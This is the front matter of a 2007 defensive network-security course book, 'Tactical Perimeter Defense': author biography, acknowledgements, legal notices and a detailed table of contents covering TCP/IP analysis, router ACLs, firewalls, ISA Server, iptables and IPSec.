
Tactical Perimeter Defense

Warren Peterson
Warren Peterson is the President of Security Certified Program, LLC and the founder of the Security Certified Program. Mr. Peterson regularly delivers standing-room-only security presentations for government and corporate clients on subjects ranging from general security to the threats of cyber terrorism. Mr. Peterson is an accomplished and experienced teacher who holds many industry certifications. His training methods have earned him the utmost respect and recognition from both his students and his peers. Even many years after courses have ended, many of Mr. Peterson's students from around the world stay in touch with him.

Mr. Peterson has developed instructional curriculum for customized courses, such as courses for Microsoft, Cisco, CompTIA, and various security programs. In addition to writing for magazines, such as Certification Magazine, he is the lead author for the Security Certified Program courses, including: Network Security Fundamentals, Hardening the Infrastructure, Network Defense and Countermeasures, Tactical Perimeter Defense, Strategic Infrastructure Security, Advanced Security Implementation, and Enterprise Security Solutions.

Mr. Peterson includes the following personal thanks:

Thank you to my wife, Carin. You and our girls give me constant support, and I thank you for your devotion. You remind me daily why teaching is so important. I love you deeply, and look forward to seeing you again now that this writing phase is over!

Thank you to Waleed. You have been the foundation behind more positive change than I can describe; knowing you and working with you has been a true pleasure.

Thanks to Gene, for your trusted advice and mentoring; to Mark, for your passion and enthusiasm (go have another coffee!); to Tracy, for your loyalty and friendship, which are unmatched; to Joe, for your professionalism, and desire for the best; to Dave, for always being there, even early in the morning. And, thanks to Charles, Shrinath, and Robert: time has moved us apart, but you have each made an impression on me, and I thank you for that.
TACTICAL PERIMETER DEFENSE
For software version: N/A
ACKNOWLEDGEMENTS
Project Team
Curriculum and Technical Writers: Warren Peterson and Clay Scott
Copy Editor: Carin Peterson
Reviewing Editor: Sandy Castle-Rhoads
Technical Editor: Tracy Richter
Quality Assurance Analyst: David Young
Graphic Designer: Mark Patrick
Project Support
Development Assistance: Ben Tchoubineh
NOTICES
DISCLAIMER: While Security Certified Program LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or fitness for a particular purpose. Any name used in the data files for this course is that of a fictitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyone's name in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Security Certified Program LLC is an independent developer of courseware and certification programs for individuals, businesses, educational institutions, and government agencies. Use of screenshots, photographs of another entity's products, or another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship or endorsement of the book by, nor any affiliation of such entity with, Security Certified Program LLC. This courseware may contain links to sites on the Internet that are owned and operated by third parties (the "External Sites"). Security Certified Program LLC is not responsible for the availability of, or the content located on or through, any External Site. Please contact Security Certified Program LLC if you have any concerns regarding such links or External Sites.

TRADEMARK NOTICES: The Security Certified Program, SCP, SCNS, SCNP, and SCNA are trademarks of The Security Certified Program, LLC in the U.S. and other countries; The Security Certified Program, SCP, SCNS, SCNP, products and services discussed or described may be trademarks of The Security Certified Program, LLC. All other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors.

Copyright 2007 Security Certified Program, LLC. All rights reserved. Screenshots used for illustrative purposes are the property of the software proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written permission of Security Certified Program LLC, 825 West State Street, Suite 204, Geneva, Illinois 60134, USA. (630) 208-5030. Security Certified Program LLC's World Wide Web site is located at: www.SecurityCertified.Net.

This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the user according to the terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Security Certified Program LLC materials are being reproduced or transmitted without permission, please call 1-630-208-5030.
Course Edition: 2.0
Course Number: SCPTPD20
CONTENT OVERVIEW
About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii
Lesson 1: Network Defense Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Lesson 2: Advanced TCP/IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Lesson 3: Routers and Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Lesson 4: Designing Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Lesson 5: Configuring Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Lesson 6: Implementing IPSec and VPNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Lesson 7: Designing an Intrusion Detection System . . . . . . . . . . . . . . . . . . . . . . . 369
Lesson 8: Configuring an IDS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Lesson 9: Securing Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
Glossary. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
CONTENTS
About This Course . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii
Course Setup Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxii
How To Use This Book. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xl
LESSON 1: NETWORK DEFENSE FUNDAMENTALS
Topic 1A Network Defense. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Five Key Issues of Network Security . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
The Threats to Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Defensive Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Defensive Strategy Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Task 1A-1 Identifying Non-repudiation Issues . . . . . . . . . . . . . . . . . . . 10
Topic 1B Defensive Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
The Castle Analogy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Attacking the Castle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
The Castle's Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
The Castle's Intrusion Detection. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
The Castle's Back Doors. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
The Defense Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Task 1B-1 Describing the Layers of a Defended Network . . . . . . . . . . . . 14
Topic 1C Objectives of Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Authentication Tokens. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Task 1C-1 Describing the Challenge Response Token Process . . . . . . . . . 20
Topic 1D The Impact of Defense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Intrusion Detection Systems. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Auditing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Task 1D-1 Describing the Problems of Additional Layers of Security. . . . . 23
Topic 1E Network Auditing Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Security Auditing Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Security Audits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Audit Trails . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Handling and Preserving Audit Data. . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Legal Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Task 1E-1 Describing Network Auditing . . . . . . . . . . . . . . . . . . . . . . . 26
Lesson Review 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
LESSON 2: ADVANCED TCP/IP
Topic 2A TCP/IP Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
RFCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
The Function of IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
The Subnet Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Task 2A-1 Layering and Address Conversions . . . . . . . . . . . . . . . . . . . . 42
Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
VLSM and CIDR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
X-casting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Task 2A-2 Routers and Subnetting. . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Topic 2B Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . . 46
Connections. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Task 2B-1 Using Network Monitor . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Wireshark. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
Task 2B-2 Installing and Starting Wireshark . . . . . . . . . . . . . . . . . . . . 58
Wireshark Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Task 2B-3 Using Wireshark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
TCP Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Task 2B-4 Analyzing the Three-way Handshake . . . . . . . . . . . . . . . . . . 63
The Session Teardown Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Task 2B-5 Analyzing the Session Teardown Process. . . . . . . . . . . . . . . . 65
Topic 2C Capturing and Identifying IP Datagrams . . . . . . . . . . . . . . . . 65
Task 2C-1 Capturing and Identifying IP Datagrams. . . . . . . . . . . . . . . . 67
Topic 2D Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 68
Task 2D-1 Capturing and Identifying ICMP Messages. . . . . . . . . . . . . . . 69
Topic 2E Capturing and Identifying TCP Headers . . . . . . . . . . . . . . . . . 70
Task 2E-1 Capturing and Identifying TCP Headers. . . . . . . . . . . . . . . . . 72
Topic 2F Capturing and Identifying UDP Headers . . . . . . . . . . . . . . . . 73
Task 2F-1 Working with UDP Headers. . . . . . . . . . . . . . . . . . . . . . . . . 73
Topic 2G Analyzing Packet Fragmentation. . . . . . . . . . . . . . . . . . . . . . . 74
Task 2G-1 Analyzing Fragmentation. . . . . . . . . . . . . . . . . . . . . . . . . . 75
Topic 2H Analyzing an Entire Session . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Task 2H-1 Performing a Complete ICMP Session Analysis . . . . . . . . . . . . 76
Continuing the Complete Session Analysis. . . . . . . . . . . . . . . . . . . . . . 79
Task 2H-2 Performing a Complete FTP Session Analysis . . . . . . . . . . . . . 80
Lesson Review 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
LESSON 3: ROUTERS AND ACCESS CONTROL LISTS
Topic 3A Fundamental Cisco Security. . . . . . . . . . . . . . . . . . . . . . . . . . . 96
Authentication and Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Configuring Access Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
Task 3A-1 Configuring Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Creating User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Implementing Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Implementing Cisco Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Task 3A-2 Configuring Login Banners. . . . . . . . . . . . . . . . . . . . . . . . . 103
SSH Overview. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Router Configuration to use SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Task 3A-3 Configuring SSH on a Router . . . . . . . . . . . . . . . . . . . . . . . 105
Task 3A-4 Configuring the SSH Client. . . . . . . . . . . . . . . . . . . . . . . . . 107
Topic 3B Routing Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .108
The ARP Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
LAN-to-LAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
LAN-to-WAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Task 3B-1 Performing IP and MAC Analysis . . . . . . . . . . . . . . . . . . . . . 113
The Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
Static and Dynamic Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Comparing Routed Protocols and Routing Protocols . . . . . . . . . . . . . . 119
The Routing Protocols. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
Task 3B-2 Viewing a RIP Capture. . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
RIPv2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Task 3B-3 Viewing a RIPv2 Capture . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Topic 3C Removing Protocols and Services . . . . . . . . . . . . . . . . . . . . . .128
CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Task 3C-1 Turning Off CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Task 3C-2 Hardening ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Source Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Small Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Finger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Remaining Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Task 3C-3 Removing Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 133
AutoSecure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Topic 3D Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . .134
Access Control List Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
The Access List Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
The Wildcard Mask. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Task 3D-1 Creating Wildcard Masks . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Topic 3E Implementing Access Control Lists . . . . . . . . . . . . . . . . . . . .138
Defending Against Attacks with ACLs. . . . . . . . . . . . . . . . . . . . . . . . . . 142
Task 3E-1 Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . 144
Context-based Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Topic 3F Logging Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .145
Configuring Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Task 3F-1 Configuring Buffered Logging. . . . . . . . . . . . . . . . . . . . . . . 149
ACL Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Task 3F-2 Configuring Anti-spoofing Logging . . . . . . . . . . . . . . . . . . . 151
Lesson Review 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
LESSON 4: DESIGNING FIREWALLS
Topic 4A Firewall Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .156
Firewall Methodologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
What a Firewall Cannot Do . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Implementation Options for Firewalls. . . . . . . . . . . . . . . . . . . . . . . . . . 158
Task 4A-1 Firewall Planning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
Topic 4B Create a Firewall Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .163
Task 4B-1 Creating a Simple Firewall Policy. . . . . . . . . . . . . . . . . . . . . 167
Topic 4C Rule Sets and Packet Filters . . . . . . . . . . . . . . . . . . . . . . . . . .168
Stateless and Stateful Packet Inspection . . . . . . . . . . . . . . . . . . . . . . . 172
How Attackers Get Around Packet Filters . . . . . . . . . . . . . . . . . . . . . . . 175
Task 4C-1 Firewall Rule Creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Topic 4D Proxy Server. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .176
Proxy Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Proxy Benefits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Proxy Problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Task 4D-1 Diagram the Proxy Process . . . . . . . . . . . . . . . . . . . . . . . . . 179
Topic 4E The Bastion Host. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .180
An Attack on the Bastion Host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Task 4E-1 Describing a Bastion Host . . . . . . . . . . . . . . . . . . . . . . . . . 182
Topic 4F The Honeypot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .182
What is a Honeypot?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Goals of the Honeypot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Legal Issues. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Task 4F-1 Honeypot Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . 184
Lesson Review 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
LESSON 5: CONFIGURING FIREWALLS
Topic 5A Understanding Firewalls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .190
Address, Port, Protocol, and Services: The Building Blocks of Firewall Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Examining the Common Types of Firewalls . . . . . . . . . . . . . . . . . . . . . . 196
Building Firewall Rules to Control Network Communications. . . . . . . . 201
Common Firewall Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Why Would I Want a Firewall on My Network? . . . . . . . . . . . . . . . . . . . 205
What Can a Firewall Not Protect You From? . . . . . . . . . . . . . . . . . . . . . 206
Things to Consider About Firewall Implementation . . . . . . . . . . . . . . . 207
Topic 5B Configuring Microsoft ISA Server 2006 . . . . . . . . . . . . . . . . .210
Introduction to ISA Server 2006. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Task 5B-1 Preparing for the ISA Server 2006 . . . . . . . . . . . . . . . . . . . . 212
ISA Server Installation Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Task 5B-2 Install Microsoft ISA Server 2006 . . . . . . . . . . . . . . . . . . . . 215
Configuring ISA Server 2006. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Task 5B-3 Exploring the Microsoft ISA Server 2006 Interface . . . . . . . . . 218
Exporting/Importing ISA Server 2006 Configurations as XML Files . . . 223
Task 5B-4 Exporting the Default Configuration . . . . . . . . . . . . . . . . . . 223
ISA Server 2006 Firewall Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Task 5B-5 Creating a Basic Access Rule . . . . . . . . . . . . . . . . . . . . . . . 226
ISA Server 2006 Access Rule Elements . . . . . . . . . . . . . . . . . . . . . . . . . 230
Task 5B-6 Creating a Protocol Rule Element . . . . . . . . . . . . . . . . . . . . 231
Task 5B-7 Creating a User Rule Element . . . . . . . . . . . . . . . . . . . . . . . 233
Content Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
Task 5B-8 Creating a Content Group Rule Element . . . . . . . . . . . . . . . . 234
ISA Server 2006 Scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
Task 5B-9 Creating and Modifying Schedule Rule Elements. . . . . . . . . . . 236
Using Content Types and Schedules in Rules . . . . . . . . . . . . . . . . . . . . 237
Task 5B-10 Using Content Types and Schedules in Rules . . . . . . . . . . . . . 237
ISA Server 2006 Network Rule Elements. . . . . . . . . . . . . . . . . . . . . . . . 239
Task 5B-11 Creating a Network Rule Element . . . . . . . . . . . . . . . . . . . . 240
ISA Server Publishing Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Task 5B-12 Configuring a Web Publishing Rule . . . . . . . . . . . . . . . . . . . 242
ISA Server 2006 Caching. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245
Task 5B-13 Enabling and Configuring Caching. . . . . . . . . . . . . . . . . . . . 245
Configuring ISA Server 2006 Network Templates . . . . . . . . . . . . . . . . . 249
Task 5B-14 Install Second Microsoft Loop Back Adapter and Assign an IP Address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Task 5B-15 Configure ISA Server 2006 in a Three-legged DMZ . . . . . . . . . 251
Configuring ISA Server Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Task 5B-16 Working with Alerts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Task 5B-17 Working with Reports . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
ISA Server 2006 Logging. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
Task 5B-18 Configuring Logging Options . . . . . . . . . . . . . . . . . . . . . . . 262
Additional Configuration Options for ISA Server 2006. . . . . . . . . . . . . 265
Task 5B-19 Securing ISA Server 2006 with the Security Configuration Wizard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Packet Prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Task 5B-20 Configuring Packet Prioritization. . . . . . . . . . . . . . . . . . . . . 268
Uninstalling ISA Server 2006 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Task 5B-21 Uninstalling ISA Server 2006 . . . . . . . . . . . . . . . . . . . . . . . 270
Topic 5C IPTables Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .271
Firewalling in Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
The Flow of the Chains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Configuration Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
The iptables Command . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
Chain Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Rule Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Rule Creation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Other Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Rule Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Creating a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Deleting a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Flushing a Chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Checking for Connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Negating Values. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Defining a Target. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Complex Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Configuring Masquerading. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Task 5C-1 Working with Chain Management . . . . . . . . . . . . . . . . . . . . 288
Topic 5D Implementing Firewall Technologies . . . . . . . . . . . . . . . . . . .290
Lesson Review 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
LESSON 6: IMPLEMENTING IPSEC AND VPNS
Topic 6A Internet Protocol Security . . . . . . . . . . . . . . . . . . . . . . . . . . . .301
Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302
IPSec Implementation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Task 6A-1 Describing the Need for IPSec . . . . . . . . . . . . . . . . . . . . . . 304
Topic 6B IPSec Policy Management. . . . . . . . . . . . . . . . . . . . . . . . . . . . .304
The MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Task 6B-1 Examining the MMC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
IPSec Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Task 6B-2 Identifying Default IPSec Security Policies . . . . . . . . . . . . . . 306
Saving the Customized MMC Configuration . . . . . . . . . . . . . . . . . . . . . 307
Task 6B-3 Saving a Customized MMC . . . . . . . . . . . . . . . . . . . . . . . . . 307
The Secure Server (Require Security) Policy . . . . . . . . . . . . . . . . . . . . . 307
Task 6B-4 Examining Security Methods. . . . . . . . . . . . . . . . . . . . . . . . 308
The Rules Tab for the Secure Server (Require Security) Policy. . . . . . . 309
Task 6B-5 Examining Policy Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
Topic 6C IPSec AH Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . .312
Creating Custom IPSec Policies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
Task 6C-1 Creating the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . 315
Editing Authentication Method Policies . . . . . . . . . . . . . . . . . . . . . . . . 317
Task 6C-2 Editing the 1_REQUEST_AH(md5)_only Policy . . . . . . . . . . . . 318
Setting Up the Computer's Response . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
Task 6C-3 Configuring the Policy Response . . . . . . . . . . . . . . . . . . . . . 320
Configuring AH in Both Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Task 6C-4 Configuring the Second Computer . . . . . . . . . . . . . . . . . . . . 321
Configuring FTP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322
Task 6C-5 Setting Up the FTP Process . . . . . . . . . . . . . . . . . . . . . . . . 322
Implementing the IPSec Policy. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
Task 6C-6 Implementing the 1_REQUEST_AH(md5)_only Policy. . . . . . . . 324
Request-only Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Task 6C-7 Analyzing the Request-only Session. . . . . . . . . . . . . . . . . . . 325
Implementing a Request-and-Respond Policy . . . . . . . . . . . . . . . . . . . 325
Task 6C-8 Configuring a Request-and-Respond IPSec Session. . . . . . . . . 325
Request-and-Respond Session Analysis . . . . . . . . . . . . . . . . . . . . . . . . 326
Task 6C-9 Analyzing the Request-and-Respond Session. . . . . . . . . . . . . 326
Topic 6D Combining AH and ESP in IPSec . . . . . . . . . . . . . . . . . . . . . . .327
Task 6D-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327
Configuring the IPSec Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
Task 6D-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy . . . . 330
AH and ESP IPSec Session Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Task 6D-3 Configuring and Analyzing an IPSec Session Using AH and ESP. 331
Configuring All the Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
